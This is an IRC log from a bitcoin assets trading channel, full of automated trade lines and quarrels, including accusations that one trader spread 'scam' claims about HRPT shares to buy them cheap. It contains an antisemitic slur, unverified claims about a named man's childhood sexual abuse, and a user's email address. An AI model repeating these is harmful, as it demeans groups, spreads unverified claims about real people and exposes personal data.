Sep 12 19:33:02 now i won't waste up your bandwidth Sep 12 19:33:17 as i watch this over and over Sep 12 19:33:37 so i click on the link Sep 12 19:33:40 lmao Sep 12 19:33:50 i have more bandwidth than god, but i appreciate the intent. Sep 12 19:34:04 and jewtube says the vid is not public and only those with the URL can see it Sep 12 19:34:14 i have some hardcore republican friends who will just eat it up Sep 12 19:34:26 ya a girl just said the same thing to me jcpham Sep 12 19:34:29 [GLBSE] [PUREMINING] 5 @ 0.0942 = 0.471 BTC [-] Sep 12 19:34:34 as kakobrekla Sep 12 19:35:25 and ofcourse, "How to cook Bacon by the Quran (Barbequran)" seems a better title :D Sep 12 19:35:49 lol Sep 12 19:35:58 i put a little thought in it Sep 12 19:36:07 i just wonder how long until i get death threats Sep 12 19:36:11 can we get the bandwidth waster fixed Sep 12 19:36:19 [GLBSE] [PUREMINING] 3 @ 0.098 = 0.294 BTC [+] Sep 12 19:36:26 it's public now Sep 12 19:37:53 death threats ? Sep 12 19:37:57 fuck you jcpham. i kill you! Sep 12 19:38:01 yes! Sep 12 19:38:37 i did Sep 12 19:38:53 i wish i would have thought of it first Sep 12 19:39:01 i give credit where credit is due Sep 12 19:39:08 huh ? Sep 12 19:41:51 [GLBSE] [SS] 1 @ 0.02 BTC [+] Sep 12 19:42:36 [GLBSE] [OBSI.HRPT] 10 @ 0.09539999 = 0.954 BTC [+] Sep 12 19:42:58 [GLBSE] [ASICMINER] 39 @ 0.10060003 = 3.9234 BTC [+] Sep 12 19:43:00 [GLBSE] [ASICMINER] 34 @ 0.10050003 = 3.417 BTC [-] Sep 12 19:43:01 [GLBSE] [ASICMINER] 10 @ 0.10050002 = 1.005 BTC [-] Sep 12 19:43:02 [GLBSE] [ASICMINER] 15 @ 0.10050001 = 1.5075 BTC [-] Sep 12 19:43:03 [GLBSE] [ASICMINER] 2 @ 0.1005 = 0.201 BTC [-] Sep 12 19:43:50 [GLBSE] [PUREMINING] 2 @ 0.0942 = 0.1884 BTC [-] Sep 12 19:44:40 [GLBSE] [ASICMINER] 8 @ 0.1005 = 0.804 BTC [-] Sep 12 19:44:41 [GLBSE] [ASICMINER] 50 @ 0.10030006 = 5.015 BTC [-] Sep 12 19:44:42 [GLBSE] [ASICMINER] 34 @ 0.10020006 = 3.4068 BTC [-] Sep 12 19:44:43 [GLBSE] [ASICMINER] 8 @ 0.10020005 = 0.8016 BTC [-] Sep 12 19:51:11 [GLBSE] [GIGAMINING] 1 @ 0.5889 BTC [+] Sep 12 19:53:15 [GLBSE] [OBSI.HRPT] 12 @ 0.08100001 = 0.972 BTC [-] Sep 12 19:55:02 [MPEX] [F.GIGA.ETF] 6500 @ 0.00040513 = 2.6333 BTC [+] Sep 12 19:55:04 [MPEX] [S.MPOE] 4222 @ 0.0003953 = 1.669 BTC [-] Sep 12 19:58:01 You look like one of Matthew's girlfriends. Sep 12 19:58:42 Smoovious, I've heard things from the man you wouldn't believe. Sep 12 19:59:07 Bane_Capital, test us. Sep 12 19:59:21 Let's see... Sep 12 19:59:22 Oh Sep 12 19:59:39 Yeah, he got fondled and sexually abused in a locker room as a child. Sep 12 19:59:47 He brags about it Sep 12 19:59:56 I was freaked out to say the least Sep 12 20:00:09 who's this ? Sep 12 20:00:16 Matthew N. Wright Sep 12 20:00:25 lol I don't know Sep 12 20:00:31 well ok that preety heavy. Sep 12 20:00:39 but, belivable. Sep 12 20:00:41 :) Sep 12 20:00:41 He calls his girlfriends his projects that need a lot of fixing Sep 12 20:00:54 When they don't make the cut or progress Sep 12 20:00:59 he dumps them Sep 12 20:01:02 Very controlling Sep 12 20:01:28 Smoovious: He's white and in Korea. Women line up. Sep 12 20:01:40 Unfortunately. Sep 12 20:02:23 Well he did show me the collection of red light tickets he pays off every year Sep 12 20:02:29 He just runs lights Sep 12 20:02:35 then pays the fines like no big deal Sep 12 20:03:29 lol Sep 12 20:04:22 Check your privilege. Sep 12 20:04:43 http://i.imgur.com/OfmjE.png It could be worse. Sep 12 20:06:06 [GLBSE] [TYGRR.BOT] 2 @ 0.91 = 1.82 BTC [-] Sep 12 20:06:38 It's a mixture of different info Sep 12 20:08:29 ill do escrow Sep 12 20:08:33 what r ya'll doing Sep 12 20:08:50 Finding girls on the internet because they haven't left the house in months. Sep 12 20:08:51 fuck me*? Sep 12 20:08:53 FUCK YOU. Sep 12 20:08:57 :p Sep 12 20:09:57 in mah wallet Sep 12 20:10:19 I would reveal hints but I don't want to spoil the fun. Sep 12 20:10:31 She gives them blatantly in several places. Sep 12 20:11:25 obviously you are not serious. Sep 12 20:11:40 Who? I certainly am. Sep 12 20:12:03 not you Sep 12 20:12:26 [GLBSE] [GSDPT] 100 @ 0.0034 = 0.34 BTC [+] Sep 12 20:12:39 no i just want to see the end of this Sep 12 20:12:45 usagi: Life would be too boring otherwise. Sep 12 20:12:58 Sitting down silent is dull. Sep 12 20:14:27 [GLBSE] [NYAN.A] 1 @ 0.95 BTC [+] Sep 12 20:17:44 [GLBSE] [NYAN] 3 @ 0.77 = 2.31 BTC [-] Sep 12 20:17:45 [GLBSE] [NYAN] 10 @ 0.78 = 7.8 BTC [+] Sep 12 20:17:47 [GLBSE] [NYAN] 10 @ 0.79 = 7.9 BTC [+] Sep 12 20:17:48 [GLBSE] [NYAN] 20 @ 0.8 = 16 BTC [+] Sep 12 20:17:49 [GLBSE] [NYAN] 7 @ 0.8 = 5.6 BTC [+] Sep 12 20:21:40 [GLBSE] [OBSI.HRPT] 3 @ 0.09499998 = 0.285 BTC [+] Sep 12 20:23:30 [GLBSE] [ASICMINER] 6 @ 0.101 = 0.606 BTC [+] Sep 12 20:23:32 [GLBSE] [ASICMINER] 26 @ 0.10020005 = 2.6052 BTC [-] Sep 12 20:23:33 [GLBSE] [ASICMINER] 34 @ 0.10020004 = 3.4068 BTC [-] Sep 12 20:23:34 [GLBSE] [ASICMINER] 34 @ 0.10020003 = 3.4068 BTC [-] Sep 12 20:23:35 [GLBSE] [ASICMINER] 168 @ 0.10010001 = 16.8168 BTC [-] Sep 12 20:28:03 [MPEX] [S.MPOE] 12533 @ 0.00039841 = 4.9933 BTC [+] Sep 12 20:28:04 [MPEX] [S.MPOE] 12867 @ 0.00039957 = 5.1413 BTC [+] Sep 12 20:29:21 When they don't make the cut or progress he dumps them << i do the exact same thing. Sep 12 20:31:41 creepy Sep 12 20:31:54 jcpham http://www.youtube.com/watch?v=kXmYv_Tc34A << her life before islam was sporadic. Sep 12 20:32:23 [GLBSE] [BDK.BND] 1 @ 0.09999 BTC [+] Sep 12 20:33:11 [GLBSE] [OBSI.HRPT] 10 @ 0.09499998 = 0.95 BTC [+] Sep 12 20:33:13 [GLBSE] [OBSI.HRPT] 11 @ 0.09499999 = 1.045 BTC [+] Sep 12 20:33:14 [GLBSE] [OBSI.HRPT] 13 @ 0.09499999 = 1.235 BTC [+] Sep 12 20:33:14 [GLBSE] [OBSI.HRPT] 14 @ 0.095 = 1.33 BTC [+] Sep 12 20:33:16 [GLBSE] [OBSI.HRPT] 24 @ 0.09529999 = 2.2872 BTC [+] Sep 12 20:33:17 [GLBSE] [OBSI.HRPT] 6 @ 0.0953 = 0.5718 BTC [+] Sep 12 20:33:18 [GLBSE] [OBSI.HRPT] 70 @ 0.09539999 = 6.678 BTC [+] Sep 12 20:33:19 [GLBSE] [OBSI.HRPT] 21 @ 0.0954 = 2.0034 BTC [+] Sep 12 20:33:20 [GLBSE] [OBSI.HRPT] 28 @ 0.0954 = 2.6712 BTC [+] Sep 12 20:33:22 [GLBSE] [OBSI.HRPT] 17 @ 0.09699999 = 1.649 BTC [+] Sep 12 20:33:23 [GLBSE] [OBSI.HRPT] 3 @ 0.097 = 0.291 BTC [+] Sep 12 20:34:59 [GLBSE] [OBSI.HRPT] 1 @ 0.0997 BTC [+] Sep 12 20:35:01 [GLBSE] [OBSI.HRPT] 99 @ 0.0999 = 9.8901 BTC [+] Sep 12 20:35:02 [GLBSE] [OBSI.HRPT] 19 @ 0.09999945 = 1.9 BTC [+] Sep 12 20:35:02 [GLBSE] [OBSI.HRPT] 75 @ 0.0999997 = 7.5 BTC [+] Sep 12 20:35:04 [GLBSE] [OBSI.HRPT] 450 @ 0.0999998 = 44.9999 BTC [+] Sep 12 20:35:05 [GLBSE] [OBSI.HRPT] 50 @ 0.09999999 = 5 BTC [+] Sep 12 20:35:06 [GLBSE] [OBSI.HRPT] 91 @ 0.1 = 9.1 BTC [+] Sep 12 20:35:07 [GLBSE] [OBSI.HRPT] 50 @ 0.1 = 5 BTC [+] Sep 12 20:35:08 [GLBSE] [OBSI.HRPT] 85 @ 0.1 = 8.5 BTC [+] Sep 12 20:35:10 [GLBSE] [OBSI.HRPT] 20 @ 0.1 = 2 BTC [+] Sep 12 20:35:11 [GLBSE] [OBSI.HRPT] 60 @ 0.1 = 6 BTC [+] Sep 12 20:35:12 [GLBSE] [OBSI.HRPT] 133 @ 0.098 = 13.034 BTC [-] Sep 12 20:35:14 [GLBSE] [OBSI.HRPT] 35 @ 0.09 = 3.15 BTC [-] Sep 12 20:35:15 [GLBSE] [OBSI.HRPT] 4 @ 0.09 = 0.36 BTC [-] Sep 12 20:35:16 [GLBSE] [OBSI.HRPT] 4 @ 0.08150001 = 0.326 BTC [-] Sep 12 20:35:18 [GLBSE] [OBSI.HRPT] 1 @ 0.0815 BTC [-] Sep 12 20:35:19 [GLBSE] [OBSI.HRPT] 100 @ 0.08001 = 8.001 BTC [-] Sep 12 20:35:35 [GLBSE] [OBSI.HRPT] 23 @ 0.08 = 1.84 BTC [-] Sep 12 20:35:47 man whats with the hrpt fight Sep 12 20:35:51 [GLBSE] [OBSI.HRPT] 21 @ 0.08150002 = 1.7115 BTC [+] Sep 12 20:36:12 [GLBSE] [OBSI.HRPT] 179 @ 0.08 = 14.32 BTC [-] Sep 12 20:36:14 [GLBSE] [OBSI.HRPT] 471 @ 0.1 = 47.1 BTC [+] Sep 12 20:36:41 !ticker obsi.hrpt Sep 12 20:36:47 [GLBSE:OBSI.HRPT] [Bid: 0.08100001] [Ask: 0.099] [Spread: 0.01799999] [Last: 0.1] [24hVol: 402.72168739] [7dAvg: 0.0992472] Sep 12 20:37:02 [GLBSE] [OBSI.HRPT] 50 @ 0.08100001 = 4.05 BTC [-] Sep 12 20:37:03 [GLBSE] [OBSI.HRPT] 50 @ 0.08000001 = 4 BTC [-] Sep 12 20:37:09 lol 20% spread Sep 12 20:37:28 Obsi: usagi called hrpt a scam :< Sep 12 20:38:09 [GLBSE] [OBSI.HRPT] 90 @ 0.08 = 7.2 BTC [-] Sep 12 20:38:11 yall are a buncha drama queens Sep 12 20:38:25 [GLBSE] [OBSI.HRPT] 1 @ 0.08 BTC [-] Sep 12 20:38:43 I now think of you guys as "matthew lite" Sep 12 20:39:03 [MPEX] [S.MPOE] 24224 @ 0.00039957 = 9.6792 BTC [+] Sep 12 20:39:04 [MPEX] [S.MPOE] 21843 @ 0.00040027 = 8.7431 BTC [+] Sep 12 20:39:06 [MPEX] [S.MPOE] 60200 @ 0.00040065 = 24.1191 BTC [+] Sep 12 20:39:08 [MPEX] [S.MPOE] 2600 @ 0.00040076 = 1.042 BTC [+] Sep 12 20:39:09 [MPEX] [S.MPOE] 15038 @ 0.00040089 = 6.0286 BTC [+] Sep 12 20:39:09 [MPEX] [S.MPOE] 43700 @ 0.00040113 = 17.5294 BTC [+] Sep 12 20:39:10 [MPEX] [S.MPOE] 32395 @ 0.00040116 = 12.9956 BTC [+] Sep 12 20:39:22 and you think of yourself as pirate lite ? Sep 12 20:40:01 obsi : screw you guys, i'm going home! Sep 12 20:48:04 [GLBSE] [TYGRR.BOND-P] 21 @ 0.03 = 0.63 BTC [-] Sep 12 20:49:15 EskimoBob: echo chamber much? Sep 12 20:50:36 [GLBSE] [BIB.PIRATE] 21 @ 0.03 = 0.63 BTC [+] Sep 12 20:52:20 [GLBSE] [FOO.PPPPT] 21 @ 0.03 = 0.63 BTC [-] Sep 12 20:52:32 [GLBSE] [OBSI.HRPT] 42 @ 0.0865 = 3.633 BTC [+] Sep 12 20:54:47 [GLBSE] [OBSI.HRPT] 5 @ 0.0865 = 0.4325 BTC [+] Sep 12 20:54:47 usagi: your email is still usagi.meijin@gmail.com ? Sep 12 20:55:27 Not sure... prolly dusts graph or usagi dumping Sep 12 20:55:40 waiting for another GLBSE deposit to buy moar Sep 12 20:58:46 Still paying and I'm happy to buy any amount of shares at 0.08 Sep 12 21:00:31 [GLBSE] [OBSI.HRPT] 92 @ 0.0865 = 7.958 BTC [+] Sep 12 21:00:32 [GLBSE] [OBSI.HRPT] 20 @ 0.09888 = 1.9776 BTC [+] Sep 12 21:00:33 [GLBSE] [OBSI.HRPT] 28 @ 0.09888999 = 2.7689 BTC [+] Sep 12 21:00:34 [GLBSE] [OBSI.HRPT] 8 @ 0.09889 = 0.7911 BTC [+] Sep 12 21:00:36 [GLBSE] [OBSI.HRPT] 11 @ 0.09889995 = 1.0879 BTC [+] Sep 12 21:00:37 [GLBSE] [OBSI.HRPT] 1 @ 0.09889996 BTC [+] Sep 12 21:00:38 [GLBSE] [OBSI.HRPT] 10 @ 0.09889997 = 0.989 BTC [+] Sep 12 21:00:39 [GLBSE] [OBSI.HRPT] 1 @ 0.09889998 BTC [+] Sep 12 21:00:40 [GLBSE] [OBSI.HRPT] 5 @ 0.0989 = 0.4945 BTC [+] Sep 12 21:00:41 [GLBSE] [OBSI.HRPT] 99 @ 0.0999 = 9.8901 BTC [+] Sep 12 21:00:42 [GLBSE] [OBSI.HRPT] 425 @ 0.1 = 42.5 BTC [+] Sep 12 21:02:07 Well that makes my incoming deposit kinda pointless... anyone wanna sell OBSI.1MHS or ABMO at discount? Sep 12 21:02:33 How much? Sep 12 21:02:44 http://otakutalk.org/topic/894 Sep 12 21:02:45 lol Sep 12 21:03:32 lol now usagi is repeating lines from me Sep 12 21:03:35 You need to get Munger Sep 12 21:05:26 [GLBSE] [FPGAMINING] 1 @ 0.74 BTC [-] Sep 12 21:05:28 [GLBSE] [FPGAMINING] 5 @ 0.7321 = 3.6605 BTC [-] Sep 12 21:05:29 [GLBSE] [FPGAMINING] 9 @ 0.732 = 6.588 BTC [-] Sep 12 21:05:30 [GLBSE] [FPGAMINING] 2 @ 0.73100001 = 1.462 BTC [-] Sep 12 21:05:31 [GLBSE] [FPGAMINING] 4 @ 0.731 = 2.924 BTC [-] Sep 12 21:05:32 [GLBSE] [FPGAMINING] 4 @ 0.73000001 = 2.92 BTC [-] Sep 12 21:06:03 [MPEX] [F.GIGA.ETF] 14100 @ 0.0004 = 5.64 BTC [-] Sep 12 21:06:04 [MPEX] [F.GIGA.ETF] 7919 @ 0.00039518 = 3.1294 BTC [-] Sep 12 21:06:06 [MPEX] [F.GIGA.ETF] 17581 @ 0.00039487 = 6.9422 BTC [-] Sep 12 21:07:54 usagi bought up all the under 0.1 Sep 12 21:08:41 okay so Sep 12 21:09:37 usagi calls hrpt a scam Sep 12 21:09:38 my coin Sep 12 21:09:42 price plummets Sep 12 21:10:05 usagi buys cheap hrpt Sep 12 21:10:07 price goes up Sep 12 21:10:45 well... first he calls it a ponzi, says he'll dump it, then price falls , THEN he buys them cheap Sep 12 21:10:53 MoneyIsDebt: exactly Sep 12 21:10:58 whos the scammer here, eh? Sep 12 21:11:25 nope Sep 12 21:11:39 I was depositing coin in my GLBSE account and he sniped it Sep 12 21:12:06 EskimoBob: obsi was going to buy hrpt shares for himself Sep 12 21:12:13 usagi bought up the opportunity before I could Sep 12 21:12:17 with his coin Sep 12 21:12:27 what usagi did would be considered illegal in the real world Sep 12 21:12:30 but oh well Sep 12 21:13:01 usagi: dude! I quoted what you said! Sep 12 21:13:04 do you deny it? Sep 12 21:14:52 i buy bitvps shares back Sep 12 21:14:56 theres nothing wrong with that Sep 12 21:15:52 [10:38:41] Boy am I glad I started selling out my OBSI earlier before the crash Sep 12 21:15:52 [10:38:53] No way I'm getting stuck in another ponzi but now I'm trapped Sep 12 21:15:52 [10:38:58] I have like, several thousand shares to sell Sep 12 21:15:52 [10:39:03] and it's under .1 Sep 12 21:16:07 rg you don't go around fuding it first tho. Sep 12 21:16:10 #1 rule of IRC Sep 12 21:16:13 dont believe everything you read Sep 12 21:16:19 you should all know that. Sep 12 21:16:36 usagi: what you did was say obsi.hrpt was a scam, wait for the prices to plummet, and then you bought them cheap Sep 12 21:16:40 that IS illegal on wall street. Sep 12 21:17:07 you're like 15! Sep 12 21:18:39 yes, because I'd strangle people for putting millions of people out of work so they could buy a new yacht! Sep 12 21:18:49 idont see the problem here Sep 12 21:18:50 you're no different than them Sep 12 21:18:51 he thought one thing Sep 12 21:18:53 changed his mind Sep 12 21:18:55 and bought Sep 12 21:19:02 that happens all the time Sep 12 21:19:05 [GLBSE] [YARR] 13 @ 1 = 13 BTC [-] Sep 12 21:19:05 rg: no, he spread rumors, waited for price to plummet, then bought Sep 12 21:19:12 define spreading the rumor Sep 12 21:19:15 puh leaze Sep 12 21:19:30 Diablo-D3 is just pissy cause of DMC Sep 12 21:19:37 rg: nope Sep 12 21:19:51 nefario is just a small blip on the radar Sep 12 21:20:01 [GLBSE] [PUREMINING] 1 @ 0.0978 BTC [+] Sep 12 21:20:12 [GLBSE] [YARR] 33 @ 1 = 33 BTC [-] Sep 12 21:20:23 even if nefario makes usagi the new "ceo", DMC will continue on without their interference Sep 12 21:20:54 and their assets. Sep 12 21:21:09 mircea_popescu: the assets can be replaced. Sep 12 21:21:33 the only truely irreplaceable thing is the ceo's vision, rite ? Sep 12 21:21:51 I will continue to record those assets as stolen, and on every single monthly report on who stole them. Sep 12 21:21:59 it will never be forgotten what nefario and usagi have done Sep 12 21:22:29 usagi: you're not fooling anyone here Sep 12 21:22:48 EskimoBob: I am the founder of CEO, I hold those on behalf of the shareholders Sep 12 21:23:00 what we have is a single shareholder trying to take over the company Sep 12 21:23:02 and its not going to work Sep 12 21:23:52 EskimoBob: I have to go away? lol. Sep 12 21:24:05 I will hold the money for shareholders until nefario can be forced to turn the data over. Sep 12 21:24:20 [14:22] what we have is a single shareholder trying to take over the company Sep 12 21:24:23 lol Sep 12 21:24:24 awesome Sep 12 21:24:31 corporate takeover/intrigue! Sep 12 21:24:33 srsly. Sep 12 21:24:40 at least its interesting Sep 12 21:25:55 Smoovious: shares Sep 12 21:26:15 usagi: you can paste whatever you want. Sep 12 21:26:47 Smoovious: yes, but then the money goes into a trust until it can be turned over to the legitimate shareholders Sep 12 21:26:54 Smoovious: nefario cant touch anything that isnt on glbse Sep 12 21:27:06 usagi: you can claim whatever you want Sep 12 21:27:06 [GLBSE] [BIB.BVPS] 7 @ 0.0045 = 0.0315 BTC [+] Sep 12 21:27:08 [GLBSE] [GIGAMINING] 4 @ 0.5889 = 2.3556 BTC [+] Sep 12 21:27:14 and Ive already told obsi what you asked me to do Sep 12 21:27:17 he already knows Sep 12 21:27:27 and I already apologized to him in private Sep 12 21:27:44 there is no problem with asicminer, and his 2:1 trade for it was a great deal Sep 12 21:27:59 Smoovious: Im never building a company like that ever again Sep 12 21:28:11 Smoovious: greedy people will try to steal everything you have Sep 12 21:28:33 DMC will survive usagi and nefario Sep 12 21:28:42 like sitting in a piranha tank Sep 12 21:28:51 EskimoBob: Ive repeatedly answered your questions, why continue asking them? Sep 12 21:28:55 what am I, obama? Sep 12 21:29:01 HERP DERP BORN IN KENYA Sep 12 21:29:07 HERP DERP BORN IN KENYA Sep 12 21:29:11 HERP DERP BORN IN KENYA Sep 12 21:29:18 EskimoBob: thats all I hear out of you. Sep 12 21:29:25 so go troll elsewhere Sep 12 21:29:54 usagi: I asked you to insure DMC with CPA, and you know what you told me? "we cant, the people I invested the money in stole it" Sep 12 21:30:15 usagi: and you know what you said when I asked you to manage the assets with nyan or bmf? "abmo is a scam" Sep 12 21:30:56 Dude, you sold me out long ago Sep 12 21:31:03 [GLBSE] [YABMC] 39 @ 0.10050001 = 3.9195 BTC [-] Sep 12 21:31:04 [GLBSE] [YABMC] 1 @ 0.1005 BTC [-] Sep 12 21:31:06 [GLBSE] [YABMC] 9 @ 0.1005 = 0.9045 BTC [-] Sep 12 21:31:07 [GLBSE] [YABMC] 37 @ 0.10040001 = 3.7148 BTC [-] Sep 12 21:31:09 You never did help me! Sep 12 21:31:24 All you did was try to make a grab for the DMC assets and fuck over all the other shareholders Sep 12 21:31:26 Birthers??!? lol Sep 12 21:31:36 Wow, we were dating? I didn't even get a dinner. Sep 12 21:31:49 OneMiner: thats what it feels like Sep 12 21:32:03 [MPEX] [S.MPOE] 2400 @ 0.00040032 = 0.9608 BTC [-] Sep 12 21:32:12 apparently dedi/cloud resale contracts "cost thousands of btc, thus Diablo stole them" Sep 12 21:32:40 ok, guys, who stole my car ? Sep 12 21:32:46 usagi: I have repeatedly answered that question Sep 12 21:33:03 and Ive already said on the thread that _you_ agreed with my assessment. Sep 12 21:33:34 I dont have a personal portfolio Sep 12 21:33:39 I never claimed I did Sep 12 21:34:13 if you get 100% of the assets? YES YOU DO. Sep 12 21:34:46 usagi: if you're so pro-DMC, then vote to keep me as CEO on nefario's fake motion that he wont put up Sep 12 21:35:02 lol Sep 12 21:35:22 usagi: both you and nefario will probably end up with scammer tags on the forum because of this Sep 12 21:35:51 srsly ? Sep 12 21:35:55 Smoovious http://en.wikipedia.org/wiki/Requirements_for_becoming_a_president#United_States_of_America http://en.wikipedia.org/wiki/Natural-born-citizen_clause_of_the_U.S._Constitution Sep 12 21:36:02 [MPEX] [O.BTCUSD.P110T] 9 @ 0.10627924 = 0.9565 BTC [+] Sep 12 21:36:04 [MPEX] [O.BTCUSD.P110T] 5 @ 0.10619574 = 0.531 BTC [-] Sep 12 21:36:05 [MPEX] [O.BTCUSD.P110T] 986 @ 0.08730379 = 86.0815 BTC [-] Sep 12 21:38:11 Im not the only one that thinks this Sep 12 21:38:27 you ask me to turn on obsi even though Im a shareholder of half of abmo Sep 12 21:38:34 you refuse to insure dmc Sep 12 21:38:38 you refuse to manage dmc's assets Sep 12 21:38:47 and then you back up nefario when he pulls this shit Sep 12 21:39:02 because _you didnt want abmo_ Sep 12 21:39:03 [MPEX] [O.BTCUSD.P130T] 2 @ 0.22494287 = 0.4499 BTC [-] Sep 12 21:39:04 [MPEX] [O.BTCUSD.P130T] 884 @ 0.18299172 = 161.7647 BTC [-] Sep 12 21:39:18 and suggested I tell obsi that asicminer is going to not deliver so I could get his 5000 shares of asicminer Sep 12 21:40:22 wait what ? Sep 12 21:40:50 Smoovious: is it the shit that michael jackson has been munching on for the past couple of decades? Sep 12 21:40:56 I've been eating that for a while too Sep 12 21:40:58 I did what my shareholders asked! Why the fuck do you I worked my ass of on this deal to bring in more revenue and serve the bitcoin community better! Sep 12 21:40:59 Smoovious I'm all for that. Send it to the courts, that's what they are there for. Continuously redefining the country to improve it should be a goal. Sep 12 21:41:09 they wanted more money, and thats what I tried to do! Sep 12 21:41:59 [GLBSE] [COGNITIVE] 5 @ 0.55 = 2.75 BTC [+] Sep 12 21:44:03 [MPEX] [O.BTCUSD.P100T] 4 @ 0.06825929 = 0.273 BTC [+] Sep 12 21:44:04 [MPEX] [O.BTCUSD.P100T] 12 @ 0.06357143 = 0.7629 BTC [-] Sep 12 21:44:06 [MPEX] [O.BTCUSD.P100T] 734 @ 0.05344827 = 39.231 BTC [-] Sep 12 21:47:49 While I'm a fan of much of the constitution, it's reasonable to expect that changes will be made over time. For example the 2nd amendment. I interpet that as a gun to the head of the govt., the designers of the constitution wanted to be sure that a govt. not of the people couldn't stand. Now we have cruise missles and I feel that the orginal intent has been defeated. What should happen? We stick with what we have and change nothing? Scrap the 2n Sep 12 21:48:32 d? Or redefine it to fit with the orginal intent? That's what congress should be doing, then the courts take over from there. Insteadwe have bla, nothing, a promise to not get anything done untill the election. Sep 12 21:49:14 [GLBSE] [BBBB] 2 @ 0.000239 = 0.0005 BTC [-] Sep 12 21:50:05 Holding a knife is bearing arms too you know. I don't think they have gone so overboard. You can buy a long rifle in any state. Sep 12 21:52:32 I don't care if you can buy M60s no citizen millitia can stand against even the National Guard. The orginal intent of the 2nd is dead dead dead. Sep 12 21:52:44 Whoever wants > 1% returns a day I guess Sep 12 21:53:09 I don't care if you can buy M60s no citizen millitia can stand against even the National Guard. The orginal intent of the 2nd is dead dead dead. << this is wrong. Sep 12 21:53:22 afganistan is still standing just fine, against the whole us military. Sep 12 21:53:29 currently, nothing can defeat a citizen militia. Sep 12 21:56:26 I dig. You got some points there. But I don't think you really understand how coordinated and powerful they are. Afganistan is a cluster F at this point. The mission is all screwed up. The army is acting as a punching bag. Sep 12 21:56:48 ya well... Sep 12 21:56:58 so it's not REALLY the gun that's the problem. will and discipline are. Sep 12 21:57:06 like it was with the war of independence, just more so. Sep 12 21:59:05 You and whose army? Sep 12 22:00:59 jcpham http://trilema.com/2011/barbecuran/#comment-88769 Sep 12 22:01:02 Ya, Iraq was a cluster F from the start. Sep 12 22:02:37 All the wars where the US decided to just F up the enemy were won hands down. You can see the other results. Sep 12 22:02:54 vietnam ? Sep 12 22:03:04 Oh, except when we tried to invade Canada, damn igloo building pinkos. Sep 12 22:03:28 seems to me the russians won ww2, so. meh. dubious argument but anyway not really fit for -assets. Sep 12 22:03:51 Vietnam was all about nation building. Propping up the South against the Commie North. That war fits into the second catagory. Sep 12 22:04:40 mircea_popescu If there was one less front the Russians would have walked into a meat grinder. It was the combined effort and I'm sick of people saying X won WWII. Sep 12 22:05:02 ok so then pretty much the conclusion is the us won no war to your standards, Sep 12 22:05:06 just participated in a lot of messes. Sep 12 22:05:15 EskimoBob are you reading what I'm writing? Sep 12 22:07:51 The US kicked ass in the war of independence, Mexican America war, Korea, I'm probably missing some others... Panama, Granada. Sep 12 22:08:52 Ya, the Americans played their part in them. I'm NOT suggesting the US won WWI-II by themselves at all. Just that the alies would have gotten their spleens handed to them. Sep 12 22:09:10 granada ok. Sep 12 22:09:56 Smoovious +1 Sep 12 22:10:02 [MPEX] [F.GIGA.ETF] 16100 @ 0.00040513 = 6.5226 BTC [+] Sep 12 22:11:33 I'm out guys. Bye. Sep 12 22:11:44 [GLBSE] [ASICMINER] 1 @ 0.10399 BTC [+] Sep 12 22:14:22 [GLBSE] [KRAKEN] 1 @ 0.00999999 BTC [+] Sep 12 22:15:50 [GLBSE] [GSDPT] 3 @ 0.0034 = 0.0102 BTC [+] Sep 12 22:19:49 [GLBSE] [PUREMINING] 1 @ 0.0978 BTC [+] Sep 12 22:20:56 [GLBSE] [YARR] 12 @ 1 = 12 BTC [-] Sep 12 22:21:55 [GLBSE] [KRAKEN] 2 @ 0.00999999 = 0.02 BTC [+] Sep 12 22:31:26 [GLBSE] [OBSI.HRPT] 100 @ 0.095 = 9.5 BTC [-] Sep 12 22:32:55 [GLBSE] [KRAKEN] 329 @ 0.00999999 = 3.29 BTC [+] Sep 12 22:32:56 [GLBSE] [KRAKEN] 421 @ 0.00999999 = 4.21 BTC [+] Sep 12 22:41:03 [MPEX] [S.MPOE] 265 @ 0.00039677 = 0.1051 BTC [-] Sep 12 22:43:31 [GLBSE] [OBSI.HRPT] 3 @ 0.09999999 = 0.3 BTC [+] Sep 12 22:45:18 the drama level in this channel is over 9000 Sep 12 22:45:29 sons, i am dissapoint Sep 12 22:46:21 drama makes world go round. Sep 12 22:46:43 this community needs a solid boot to the ass Sep 12 22:47:34 we're supposed to be launching the world's first successful cryptocurrency into primetime Sep 12 22:47:56 more love and peace Sep 12 22:48:06 novusordo, supposed to. :) Sep 12 22:48:13 novusordo some of us are. Sep 12 22:48:25 in every office a couple guys do all the work, the rest just dick about. Sep 12 22:49:02 it just burns me to see a project with such great potential getting shat on by asshats Sep 12 22:49:30 [GLBSE] [CPA] 21 @ 0.0329998 = 0.693 BTC [+] Sep 12 22:49:41 i guess it shall pass. Sep 12 22:59:20 [GLBSE] [BDT] 10 @ 0.8 = 8 BTC [-] Sep 12 23:03:57 [GLBSE] [LTC-MINING] 10 @ 0.649 = 6.49 BTC [+] Sep 12 23:04:32 novusordo which project is that ? Sep 12 23:06:16 mircea_popescu: Bitcoin Sep 12 23:06:38 im sure it'll be fine. Sep 12 23:07:02 [MPEX] [S.MPOE] 9935 @ 0.00039677 = 3.9419 BTC [-] Sep 12 23:07:03 [MPEX] [O.BTCUSD.P200T] 1 @ 0.8702005 BTC [-] Sep 12 23:07:05 [MPEX] [O.BTCUSD.P200T] 1 @ 0.85457684 BTC [-] Sep 12 23:07:06 [MPEX] [O.BTCUSD.P200T] 712 @ 0.79449104 = 565.6776 BTC [-] Sep 12 23:08:35 [GLBSE] [OBSI.HRPT] 100 @ 0.09999999 = 10 BTC [+] Sep 12 23:08:37 [GLBSE] [BDK.BND] 3 @ 0.08 = 0.24 BTC [-] Sep 12 23:08:52 of course, everything passes with time. it's just aggravating. Sep 12 23:09:45 see, when they say bitcoin is resilient and when they say no government could take it down Sep 12 23:09:46 they mean it Sep 12 23:09:58 no human agency, even if working from within, even if it be the agency of idiocy. Sep 12 23:10:24 novusordo: I dunno, I think you could argue that a system as free, open, and unregulated as bitcoin will always invite a fair share of asshats. it's the cost of freedom. Sep 12 23:10:44 [GLBSE] [CIUCIU.BOND] 5 @ 0.1051 = 0.5255 BTC [-] Sep 12 23:10:45 [GLBSE] [CIUCIU.BOND] 75 @ 0.1001 = 7.5075 BTC [-] Sep 12 23:11:58 sorry mircea_popescu i attract the trolls Sep 12 23:12:04 lol Sep 12 23:12:06 i shared it here and with one person Sep 12 23:12:14 i dun care. Sep 12 23:12:18 me neither Sep 12 23:12:22 forgot about it already Sep 12 23:12:32 i need a text transcript Sep 12 23:12:34 whne you run the largest blog in any language space for a few years running you get immune or dead. Sep 12 23:12:39 where you are screaming "down with islam" Sep 12 23:12:48 lol it's nothing of the sort, i just 